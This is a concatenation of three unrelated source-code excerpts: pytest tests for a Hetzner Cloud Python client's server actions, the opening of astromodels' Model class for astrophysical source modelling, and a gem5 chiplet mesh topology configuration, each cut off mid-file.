assert bound_server.public_net.ipv4.dns_ptr == "server01.example.com"
assert isinstance(bound_server.public_net.ipv6, IPv6Network)
assert bound_server.public_net.ipv6.ip == "2001:db8::/64"
assert bound_server.public_net.ipv6.blocked is False
assert bound_server.public_net.ipv6.network == "2001:db8::"
assert bound_server.public_net.ipv6.network_mask == "64"
assert isinstance(bound_server.public_net.firewalls, list)
assert isinstance(bound_server.public_net.firewalls[0], PublicNetworkFirewall)
firewall = bound_server.public_net.firewalls[0]
assert isinstance(firewall.firewall, BoundFirewall)
assert bound_server.public_net.ipv6.blocked is False
assert firewall.status == PublicNetworkFirewall.STATUS_APPLIED
assert isinstance(bound_server.public_net.floating_ips[0], BoundFloatingIP)
assert bound_server.public_net.floating_ips[0].id == 478
assert bound_server.public_net.floating_ips[0].complete is False
assert isinstance(bound_server.datacenter, BoundDatacenter)
assert (
bound_server.datacenter._client == bound_server._client._client.datacenters
)
assert bound_server.datacenter.id == 1
assert bound_server.datacenter.complete is True
assert isinstance(bound_server.server_type, BoundServerType)
assert (
bound_server.server_type._client
== bound_server._client._client.server_types
)
assert bound_server.server_type.id == 1
assert bound_server.server_type.complete is True
assert len(bound_server.volumes) == 2
assert isinstance(bound_server.volumes[0], BoundVolume)
assert bound_server.volumes[0]._client == bound_server._client._client.volumes
assert bound_server.volumes[0].id == 1
assert bound_server.volumes[0].complete is False
assert isinstance(bound_server.volumes[1], BoundVolume)
assert bound_server.volumes[1]._client == bound_server._client._client.volumes
assert bound_server.volumes[1].id == 2
assert bound_server.volumes[1].complete is False
assert isinstance(bound_server.image, BoundImage)
assert bound_server.image._client == bound_server._client._client.images
assert bound_server.image.id == 4711
assert bound_server.image.name == "ubuntu-20.04"
assert bound_server.image.complete is True
assert isinstance(bound_server.iso, BoundIso)
assert bound_server.iso._client == bound_server._client._client.isos
assert bound_server.iso.id == 4711
assert bound_server.iso.name == "FreeBSD-11.0-RELEASE-amd64-dvd1"
assert bound_server.iso.complete is True
assert len(bound_server.private_net) == 1
assert isinstance(bound_server.private_net[0], PrivateNet)
assert (
bound_server.private_net[0].network._client
== bound_server._client._client.networks
)
assert bound_server.private_net[0].ip == "10.1.1.5"
assert bound_server.private_net[0].mac_address == "86:00:ff:2a:7d:e1"
assert len(bound_server.private_net[0].alias_ips) == 1
assert bound_server.private_net[0].alias_ips[0] == "10.1.1.8"
assert isinstance(bound_server.placement_group, BoundPlacementGroup)
assert (
bound_server.placement_group._client
== bound_server._client._client.placement_groups
)
assert bound_server.placement_group.id == 897
assert bound_server.placement_group.name == "my Placement Group"
assert bound_server.placement_group.complete is True
@pytest.mark.parametrize(
"params",
[
{
"status": [Server.STATUS_RUNNING],
"sort": "status",
"page": 1,
"per_page": 10,
},
{},
],
)
def test_get_actions_list(
self, hetzner_client, bound_server, response_get_actions, params
):
hetzner_client.request.return_value = response_get_actions
result = bound_server.get_actions_list(**params)
hetzner_client.request.assert_called_with(
url="/servers/14/actions", method="GET", params=params
)
actions = result.actions
assert result.meta is None
assert len(actions) == 1
assert isinstance(actions[0], BoundAction)
assert actions[0].id == 13
assert actions[0].command == "start_server"
@pytest.mark.parametrize(
"params", [{"status": [Server.STATUS_RUNNING], "sort": "status"}, {}]
)
def test_get_actions(
self, hetzner_client, bound_server, response_get_actions, params
):
hetzner_client.request.return_value = response_get_actions
actions = bound_server.get_actions(**params)
params.update({"page": 1, "per_page": 50})
hetzner_client.request.assert_called_with(
url="/servers/14/actions", method="GET", params=params
)
assert len(actions) == 1
assert isinstance(actions[0], BoundAction)
assert actions[0].id == 13
assert actions[0].command == "start_server"
def test_update(self, hetzner_client, bound_server, response_update_server):
hetzner_client.request.return_value = response_update_server
server = bound_server.update(name="new-name", labels={})
hetzner_client.request.assert_called_with(
url="/servers/14", method="PUT", json={"name": "new-name", "labels": {}}
)
assert server.id == 14
assert server.name == "new-name"
def test_delete(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.delete()
hetzner_client.request.assert_called_with(url="/servers/14", method="DELETE")
assert action.id == 1
assert action.progress == 0
def test_power_off(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.power_off()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/poweroff", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_power_on(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.power_on()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/poweron", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_reboot(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.reboot()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/reboot", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_reset(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.reset()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/reset", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_shutdown(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.shutdown()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/shutdown", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_reset_password(
self, hetzner_client, bound_server, response_server_reset_password
):
hetzner_client.request.return_value = response_server_reset_password
response = bound_server.reset_password()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/reset_password", method="POST"
)
assert response.action.id == 1
assert response.action.progress == 0
assert response.root_password == "<PASSWORD>"
def test_change_type(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.change_type(ServerType(name="cx11"), upgrade_disk=True)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_type",
method="POST",
json={"server_type": "cx11", "upgrade_disk": True},
)
assert action.id == 1
assert action.progress == 0
def test_enable_rescue(
self, hetzner_client, bound_server, response_server_enable_rescue
):
hetzner_client.request.return_value = response_server_enable_rescue
response = bound_server.enable_rescue(type="linux64")
hetzner_client.request.assert_called_with(
url="/servers/14/actions/enable_rescue",
method="POST",
json={"type": "linux64"},
)
assert response.action.id == 1
assert response.action.progress == 0
assert response.root_password == "<PASSWORD>"
def test_disable_rescue(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.disable_rescue()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/disable_rescue", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_create_image(
self, hetzner_client, bound_server, response_server_create_image
):
hetzner_client.request.return_value = response_server_create_image
response = bound_server.create_image(description="my image", type="snapshot")
hetzner_client.request.assert_called_with(
url="/servers/14/actions/create_image",
method="POST",
json={"description": "my image", "type": "snapshot"},
)
assert response.action.id == 1
assert response.action.progress == 0
assert response.image.description == "my image"
def test_rebuild(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.rebuild(Image(name="ubuntu-20.04"))
hetzner_client.request.assert_called_with(
url="/servers/14/actions/rebuild",
method="POST",
json={"image": "ubuntu-20.04"},
)
assert action.id == 1
assert action.progress == 0
def test_enable_backup(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.enable_backup()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/enable_backup", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_disable_backup(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.disable_backup()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/disable_backup", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_attach_iso(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.attach_iso(Iso(name="FreeBSD-11.0-RELEASE-amd64-dvd1"))
hetzner_client.request.assert_called_with(
url="/servers/14/actions/attach_iso",
method="POST",
json={"iso": "FreeBSD-11.0-RELEASE-amd64-dvd1"},
)
assert action.id == 1
assert action.progress == 0
def test_detach_iso(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.detach_iso()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/detach_iso", method="POST"
)
assert action.id == 1
assert action.progress == 0
def test_change_dns_ptr(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.change_dns_ptr("172.16.58.3", "example.com")
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_dns_ptr",
method="POST",
json={"ip": "172.16.58.3", "dns_ptr": "example.com"},
)
assert action.id == 1
assert action.progress == 0
def test_change_protection(self, hetzner_client, bound_server, generic_action):
hetzner_client.request.return_value = generic_action
action = bound_server.change_protection(True, True)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_protection",
method="POST",
json={"delete": True, "rebuild": True},
)
assert action.id == 1
assert action.progress == 0
def test_request_console(
self, hetzner_client, bound_server, response_server_request_console
):
hetzner_client.request.return_value = response_server_request_console
response = bound_server.request_console()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/request_console", method="POST"
)
assert response.action.id == 1
assert response.action.progress == 0
assert (
response.wss_url
== "wss://console.hetzner.cloud/?server_id=1&token=<PASSWORD>"
)
assert response.password == "<PASSWORD>"
@pytest.mark.parametrize(
"network", [Network(id=4711), BoundNetwork(mock.MagicMock(), dict(id=4711))]
)
def test_attach_to_network(
self, hetzner_client, bound_server, network, response_attach_to_network
):
hetzner_client.request.return_value = response_attach_to_network
action = bound_server.attach_to_network(
network, "10.0.1.1", ["10.0.1.2", "10.0.1.3"]
)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/attach_to_network",
method="POST",
json={
"network": 4711,
"ip": "10.0.1.1",
"alias_ips": ["10.0.1.2", "10.0.1.3"],
},
)
assert action.id == 1
assert action.progress == 0
assert action.command == "attach_to_network"
@pytest.mark.parametrize(
"network", [Network(id=4711), BoundNetwork(mock.MagicMock(), dict(id=4711))]
)
def test_detach_from_network(
self, hetzner_client, bound_server, network, response_detach_from_network
):
hetzner_client.request.return_value = response_detach_from_network
action = bound_server.detach_from_network(network)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/detach_from_network",
method="POST",
json={"network": 4711},
)
assert action.id == 1
assert action.progress == 0
assert action.command == "detach_from_network"
@pytest.mark.parametrize(
"network", [Network(id=4711), BoundNetwork(mock.MagicMock(), dict(id=4711))]
)
def test_change_alias_ips(
self, hetzner_client, bound_server, network, response_change_alias_ips
):
hetzner_client.request.return_value = response_change_alias_ips
action = bound_server.change_alias_ips(network, ["10.0.1.2", "10.0.1.3"])
hetzner_client.request.assert_called_with(
url="/servers/14/actions/change_alias_ips",
method="POST",
json={"network": 4711, "alias_ips": ["10.0.1.2", "10.0.1.3"]},
)
assert action.id == 1
assert action.progress == 0
assert action.command == "change_alias_ips"
@pytest.mark.parametrize(
"placement_group",
[PlacementGroup(id=897), BoundPlacementGroup(mock.MagicMock, dict(id=897))],
)
def test_add_to_placement_group(
self,
hetzner_client,
bound_server,
placement_group,
response_add_to_placement_group,
):
hetzner_client.request.return_value = response_add_to_placement_group
action = bound_server.add_to_placement_group(placement_group)
hetzner_client.request.assert_called_with(
url="/servers/14/actions/add_to_placement_group",
method="POST",
json={"placement_group": "897"},
)
assert action.id == 13
assert action.progress == 0
assert action.command == "add_to_placement_group"
def test_remove_from_placement_group(
self, hetzner_client, bound_server, response_remove_from_placement_group
):
hetzner_client.request.return_value = response_remove_from_placement_group
action = bound_server.remove_from_placement_group()
hetzner_client.request.assert_called_with(
url="/servers/14/actions/remove_from_placement_group", method="POST"
)
assert action.id == 13
assert action.progress == 100
assert action.command == "remove_from_placement_group"
class TestServersClient(object):
@pytest.fixture()
def servers_client(self):
return ServersClient(client=mock.MagicMock())
def test_get_by_id(self, servers_client, response_simple_server):
servers_client._client.request.return_value = response_simple_server
bound_server = servers_client.get_by_id(1)
servers_client._client.request.assert_called_with(
url="/servers/1", method="GET"
)
assert bound_server._client is servers_client
assert bound_server.id == 1
assert bound_server.name == "my-server"
@pytest.mark.parametrize(
"params",
[
{"name": "server1", "label_selector": "label1", "page": 1, "per_page": 10},
{"name": ""},
{},
],
)
def test_get_list(self, servers_client, response_simple_servers, params):
servers_client._client.request.return_value = response_simple_servers
result = servers_client.get_list(**params)
servers_client._client.request.assert_called_with(
url="/servers", method="GET", params=params
)
bound_servers = result.servers
assert result.meta is None
assert len(bound_servers) == 2
bound_server1 = bound_servers[0]
bound_server2 = bound_servers[1]
assert bound_server1._client is servers_client
assert bound_server1.id == 1
assert bound_server1.name == "my-server"
assert bound_server2._client is servers_client
assert bound_server2.id == 2
assert bound_server2.name == "my-server2"
@pytest.mark.parametrize(
"params", [{"name": "server1", "label_selector": "label1"}, {}]
)
def test_get_all(self, servers_client, response_simple_servers, params):
servers_client._client.request.return_value = response_simple_servers
bound_servers = servers_client.get_all(**params)
params.update({"page": 1, "per_page": 50})
servers_client._client.request.assert_called_with(
| |
<filename>astromodels/core/model.py
from builtins import zip
__author__ = "giacomov"
import collections
import os
import warnings
import numpy as np
import pandas as pd
import scipy.integrate
from astromodels.core.memoization import use_astromodels_memoization
from astromodels.core.my_yaml import my_yaml
from astromodels.core.parameter import IndependentVariable, Parameter
from astromodels.core.tree import DuplicatedNode, Node
from astromodels.functions.function import get_function
from astromodels.sources.source import (EXTENDED_SOURCE, PARTICLE_SOURCE,
POINT_SOURCE, Source)
from astromodels.utils.disk_usage import disk_usage
from astromodels.utils.logging import setup_logger
from astromodels.utils.long_path_formatter import long_path_formatter
log = setup_logger(__name__)
class ModelFileExists(IOError):
pass
class InvalidInput(ValueError):
pass
class CannotWriteModel(IOError):
def __init__(self, directory, message):
# Add a report on disk usage to the message
free_space = disk_usage(directory).free
message += "\nFree space on the file system hosting %s was %.2f Mbytes" % (
directory,
free_space / 1024.0 / 1024.0,
)
super(CannotWriteModel, self).__init__(message)
class ModelInternalError(ValueError):
pass
class Model(Node):
def __init__(self, *sources):
# Setup the node, using the special name '__root__' to indicate that this is the root of the tree
super(Model, self).__init__("__root__")
# Dictionary to keep point sources
self._point_sources = collections.OrderedDict()
# Dictionary to keep extended sources
self._extended_sources = collections.OrderedDict()
# Dictionary to keep particle sources
self._particle_sources = collections.OrderedDict()
# Loop over the provided sources and process them
for source in sources:
self._add_source(source)
# Now make the list of all the existing parameters
self._update_parameters()
# This controls the verbosity of the display
self._complete_display = False
# This will keep track of independent variables (if any)
self._independent_variables = {}
def _add_source(self, source):
"""
Remember to call _update_parameters after this!
:param source:
:return:
"""
try:
self._add_child(source)
except AttributeError:
if isinstance(source, Source):
raise DuplicatedNode(
"More than one source with the name '%s'. You cannot use the same name for multiple "
"sources" % source.name
)
else: # pragma: no cover
raise
# Now see if this is a point or extended source, and add them to the
# appropriate dictionary
if source.source_type == POINT_SOURCE:
self._point_sources[source.name] = source
elif source.source_type == EXTENDED_SOURCE:
self._extended_sources[source.name] = source
elif source.source_type == PARTICLE_SOURCE:
self._particle_sources[source.name] = source
else: # pragma: no cover
raise InvalidInput(
"Input sources must be either a point source or an extended source"
)
def _remove_source(self, source_name):
"""
Remember to call _update_parameters after this
:param source_name:
:return:
"""
assert source_name in self.sources, (
"Source %s is not part of the current model" % source_name
)
source = self.sources.pop(source_name)
if source.source_type == POINT_SOURCE:
self._point_sources.pop(source.name)
elif source.source_type == EXTENDED_SOURCE:
self._extended_sources.pop(source.name)
elif source.source_type == PARTICLE_SOURCE:
self._particle_sources.pop(source.name)
self._remove_child(source_name)
def _find_parameters(self, node):
instances = collections.OrderedDict()
for child in node._get_children():
if isinstance(child, Parameter):
path = child._get_path()
instances[path] = child
for sub_child in child._get_children():
instances.update(self._find_parameters(sub_child))
else:
instances.update(self._find_parameters(child))
return instances
def _update_parameters(self):
self._parameters = self._find_parameters(self)
@property
def parameters(self):
"""
Return a dictionary with all parameters
:return: dictionary of parameters
"""
self._update_parameters()
return self._parameters
@property
def free_parameters(self):
"""
Get a dictionary with all the free parameters in this model
:return: dictionary of free parameters
"""
# Refresh the list
self._update_parameters()
# Filter selecting only free parameters
free_parameters_dictionary = collections.OrderedDict()
for parameter_name, parameter in list(self._parameters.items()):
if parameter.free:
free_parameters_dictionary[parameter_name] = parameter
return free_parameters_dictionary
@property
def linked_parameters(self):
"""
Get a dictionary with all parameters in this model in a linked status. A parameter is in a linked status
        if it is linked to another parameter (i.e. it is forced to have the same value as the other parameter), or
if it is linked with another parameter or an independent variable through a law.
:return: dictionary of linked parameters
"""
# Refresh the list
self._update_parameters()
# Filter selecting only free parameters
linked_parameter_dictionary = collections.OrderedDict()
for parameter_name, parameter in list(self._parameters.items()):
if parameter.has_auxiliary_variable():
linked_parameter_dictionary[parameter_name] = parameter
return linked_parameter_dictionary
def set_free_parameters(self, values):
"""
Set the free parameters in the model to the provided values.
NOTE: of course, order matters
:param values: a list of new values
:return: None
"""
assert len(values) == len(self.free_parameters)
for parameter, this_value in zip(list(self.free_parameters.values()), values):
parameter.value = this_value
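    # Usage sketch (illustrative values, not from the original docs): the list must
    # match the number and order of the free parameters, e.g.
    #   model.set_free_parameters([1.3, -2.0, 4.5e-3])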
def __getitem__(self, path):
"""
        Get a parameter from a path like "source_1.component.powerlaw.logK". This might be useful in certain
        contexts, although in an interactive analysis there is no reason to use this.
:param path: the address of the parameter
:return: the parameter
"""
return self._get_child_from_path(path)
def __contains__(self, path):
"""
        This allows the model to be used with the "in" operator, like:
> if 'myparameter' in model:
> print("Myparameter is contained in the model")
:param path: the parameter to look for
:return:
"""
try:
_ = self._get_child_from_path(path)
except (AttributeError, KeyError, TypeError):
return False
else:
return True
def __iter__(self):
"""
This allows the model to be iterated on, like in:
for parameter in model:
...
NOTE: this will iterate over *all* parameters in the model, also those that are not free (and thus are not
normally displayed). If you need to operate only on free parameters, just check if they are free within
the loop or use the .free_parameters dictionary directly
:return: iterator
"""
for parameter in self.parameters:
yield self.parameters[parameter]
@property
def point_sources(self):
"""
Returns the dictionary of all defined point sources
:return: collections.OrderedDict()
"""
return self._point_sources
@property
def extended_sources(self):
"""
Returns the dictionary of all defined extended sources
:return: collections.OrderedDict()
"""
return self._extended_sources
@property
def particle_sources(self):
"""
Returns the dictionary of all defined particle sources
:return: collections.OrderedDict()
"""
return self._particle_sources
@property
def sources(self):
"""
Returns a dictionary containing all defined sources (of any kind)
:return: collections.OrderedDict()
"""
sources = collections.OrderedDict()
for d in (self.point_sources, self.extended_sources, self.particle_sources):
sources.update(d)
return sources
def add_source(self, new_source):
"""
Add the provided source to the model
:param new_source: the new source to be added (an instance of PointSource, ExtendedSource or ParticleSource)
:return: (none)
"""
self._add_source(new_source)
self._update_parameters()
def remove_source(self, source_name):
"""
        Remove the provided source from the current model (the model is modified in place). Any parameters
        linked to the source being removed are automatically unlinked.
        :param source_name: the name of the source to be removed
        :return: (none)
"""
self.unlink_all_from_source(source_name, warn=True)
self._remove_source(source_name)
self._update_parameters()
def unlink_all_from_source(self, source_name, warn=False):
"""
Unlink all parameters of the current model that are linked to a parameter of a given source.
To be called before removing a source from the model.
:param source_name: the name of the source to which to remove all links
:param warn: If True, prints a warning if any parameters were unlinked.
"""
tempmodel = Model(self[source_name])
unlinked_parameters = collections.OrderedDict()
for par in self.linked_parameters.values():
            target = par._aux_variable['variable']
if target.path in tempmodel:
unlinked_parameters[par.name] = par
self.unlink(par)
if warn and unlinked_parameters:
warnings.warn("The following %d parameters that were linked to source %s have been automatically un-linked: %s" %
(len(unlinked_parameters), source_name, [p.path for p in unlinked_parameters.values() ] ),
RuntimeWarning)
def add_independent_variable(self, variable):
"""
Add a global independent variable to this model, such as time.
:param variable: an IndependentVariable instance
:return: none
"""
assert isinstance(
variable, IndependentVariable
), "Variable must be an instance of IndependentVariable"
if self._has_child(variable.name):
self._remove_child(variable.name)
self._add_child(variable)
# Add also to the list of independent variables
self._independent_variables[variable.name] = variable
def remove_independent_variable(self, variable_name):
"""
Remove an independent variable which was added with add_independent_variable
:param variable_name: name of variable to remove
:return:
"""
self._remove_child(variable_name)
# Remove also from the list of independent variables
self._independent_variables.pop(variable_name)
def add_external_parameter(self, parameter):
"""
        Add a parameter that comes from something other than a function to the model.
:param parameter: a Parameter instance
:return: none
"""
assert isinstance(
parameter, Parameter
), "Variable must be an instance of IndependentVariable"
if self._has_child(parameter.name):
# Remove it from the children only if it is a Parameter instance, otherwise don't, which will
# make the _add_child call fail (which is the expected behaviour! You shouldn't call two children
# with the same name)
if isinstance(self._get_child(parameter.name), Parameter):
log.warning(
"External parameter %s already exist in the model. Overwriting it..."
% parameter.name
)
self._remove_child(parameter.name)
# This will fail if another node with the same name is already in the model
self._add_child(parameter)
def remove_external_parameter(self, parameter_name):
"""
Remove an external parameter which was added with add_external_parameter
        :param parameter_name: name of parameter to remove
:return:
"""
self._remove_child(parameter_name)
def link(self, parameter_1, parameter_2, link_function=None):
"""
Link the value of the provided parameters through the provided function (identity is the default, i.e.,
parameter_1 = parameter_2).
<filename>configs/topologies/CHIPS_Multicore_GTRocketN.py
# Copyright (c) 2018 Georgia Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: <NAME>
from m5.params import *
from m5.objects import *
from BaseTopology import SimpleTopology
import math
# Creates a Hierarchical Mesh Topology.
# If there are k^2 CPUs, then k clusters, each with k CPUs, are created.
# One L1 is connected to each CPU.
# Each cluster uses a Mesh NoC.
# XY routing is enforced (using link weights) to guarantee deadlock freedom.
# The k CPU clusters, k L2s and 4 Memory controllers are all
# connected as separate chiplets via a crossbar.
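# Worked example (illustrative numbers, not from the original comments): with 16 CPUs
# this builds 4 CPU chiplets, each a 2 x 2 mesh with one router per CPU/L1, plus one
# router per L2/MC/DMA node and a final crossbar router connecting all chiplets.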
class CHIPS_Multicore_GTRocketN(SimpleTopology):
description='CHIPS_Multicore_GTRocketN'
def __init__(self, controllers):
self.nodes = controllers
def makeTopology(self, options, network, IntLink, ExtLink, Router):
# Default values for link latency and router latency.
# Can be over-ridden on a per link/router basis
chiplet_link_latency = options.chiplet_link_latency
chiplet_link_width = options.chiplet_link_width
interp_link_latency = options.interposer_link_latency
interp_link_width = options.interposer_link_width
router_latency = options.router_latency
nodes = self.nodes
# First determine which nodes are cache cntrls vs. dirs vs. dma
cpu_nodes = []
l2_nodes = []
mc_nodes = []
dma_nodes = []
for node in nodes:
if node.type == 'L1Cache_Controller':
cpu_nodes.append(node)
elif node.type == 'L2Cache_Controller':
l2_nodes.append(node)
elif node.type == 'Directory_Controller':
mc_nodes.append(node)
elif node.type == 'DMA_Controller':
dma_nodes.append(node)
# Compute the configuration:
num_cpu_chiplets = int(math.sqrt(len(cpu_nodes)))
num_cpus_per_chiplet = int(len(cpu_nodes) / num_cpu_chiplets)
num_l2_mc_dma_chiplets = len(l2_nodes) + len(mc_nodes) + len(dma_nodes)
num_chiplets = num_cpu_chiplets + num_l2_mc_dma_chiplets + 1 #(xbar)
# Mesh rows and columns
num_rows = int(math.sqrt(num_cpus_per_chiplet))
num_columns = int(num_cpus_per_chiplet / num_rows)
assert((num_rows*num_columns*num_cpu_chiplets) == options.num_cpus)
num_routers = len(cpu_nodes) + len(l2_nodes) \
+ len(mc_nodes) + len(dma_nodes) \
+ 1 # (for xbar)
# Print configuration
print "Configuration:\nNum CPU Chiplets = " + str(num_cpu_chiplets) + \
"\nNum L2 Chiplets = " + str(len(l2_nodes)) + \
"\nNum MC Chiplets = " + str(len(mc_nodes)) + \
"\nNum DMA Chiplets = " + str(len(dma_nodes)) + \
"\nCPU Chiplet Configuration: " + str(num_rows) + " x " + \
str(num_columns) + " Mesh"
# Create the routers
routers = [Router(router_id=i, latency = router_latency) \
for i in range(num_routers)]
network.routers = routers
# link counter to set unique link ids
link_count = 0
# start from router 0
router_id = 0
# Connect each CPU to a unique router
ext_links = []
for (i, n) in enumerate(cpu_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("CPU", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
l2c_router_start_id = router_id
# Connect each L2 to a router
for (i, n) in enumerate(l2_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("L2", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
mcc_router_start_id = router_id
# Connect the MC nodes to routers
for (i, n) in enumerate(mc_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("MC", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
dmac_router_start_id = router_id
# Connect the DMA nodes to routers
for (i, n) in enumerate(dma_nodes):
routers[router_id].width = chiplet_link_width # nominal flit size
ext_links.append(ExtLink(link_id=link_count, ext_node=n,
int_node=routers[router_id],
latency = chiplet_link_latency,
width = chiplet_link_width))
print_connection("DMA", n.version, "Router", router_id, link_count,\
chiplet_link_latency, chiplet_link_width)
link_count += 1
router_id += 1
network.ext_links = ext_links
## All routers except xbar have been connected
assert(router_id == num_routers - 1)
xbar_id = router_id # This is the last remaining router
routers[xbar_id].latency=4 # Assume 4-cycle high-radix xbar
# Create the mesh links inside each chiplet
int_links = []
test_num_cpus = 0
for cc in xrange(num_cpu_chiplets):
print "Topology for CPU Chiplet " + str(cc) + ":"
# East output to West input links (weight = 1)
for row in xrange(num_rows):
for col in xrange(num_columns):
test_num_cpus += 1
if (col + 1 < num_columns):
east_out = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
west_in = (cc*num_cpus_per_chiplet) + (col + 1) + (row * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[east_out],
dst_node=routers[west_in],
src_outport="East",
dst_inport="West",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=1))
print_connection("Router", get_router_id(routers[east_out]),
"Router", get_router_id(routers[west_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
# West output to East input links (weight = 1)
for row in xrange(num_rows):
for col in xrange(num_columns):
if (col + 1 < num_columns):
east_in = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
west_out = (cc*num_cpus_per_chiplet) + (col + 1) + (row * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[west_out],
dst_node=routers[east_in],
src_outport="West",
dst_inport="East",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=1))
print_connection("Router", get_router_id(routers[west_out]),
"Router", get_router_id(routers[east_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
# North output to South input links (weight = 2)
for col in xrange(num_columns):
for row in xrange(num_rows):
if (row + 1 < num_rows):
north_out = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
south_in = (cc*num_cpus_per_chiplet) + col + ((row + 1) * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[north_out],
dst_node=routers[south_in],
src_outport="North",
dst_inport="South",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=2))
print_connection("Router", get_router_id(routers[north_out]),
"Router", get_router_id(routers[south_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
# South output to North input links (weight = 2)
for col in xrange(num_columns):
for row in xrange(num_rows):
if (row + 1 < num_rows):
north_in = (cc*num_cpus_per_chiplet) + col + (row * num_columns)
south_out = (cc*num_cpus_per_chiplet) + col + ((row + 1) * num_columns)
int_links.append(IntLink(link_id=link_count,
src_node=routers[south_out],
dst_node=routers[north_in],
src_outport="South",
dst_inport="North",
latency = chiplet_link_latency,
width = chiplet_link_width,
weight=2))
print_connection("Router", get_router_id(routers[south_out]),
"Router", get_router_id(routers[north_in]),
link_count,
chiplet_link_latency, chiplet_link_width)
link_count += 1
## Added all CPU chiplet links
assert(test_num_cpus == len(cpu_nodes))
## Connect all chiplets to Xbar
print "Connecting all Chiplets to Xbar Chiplet:"
# First connect all CPU chiplets via their Router "0"
cc_router_id = 0
for cc in xrange(num_cpu_chiplets):
# CPU Chiplet to Rtr
int_links.append(IntLink(link_id=link_count,
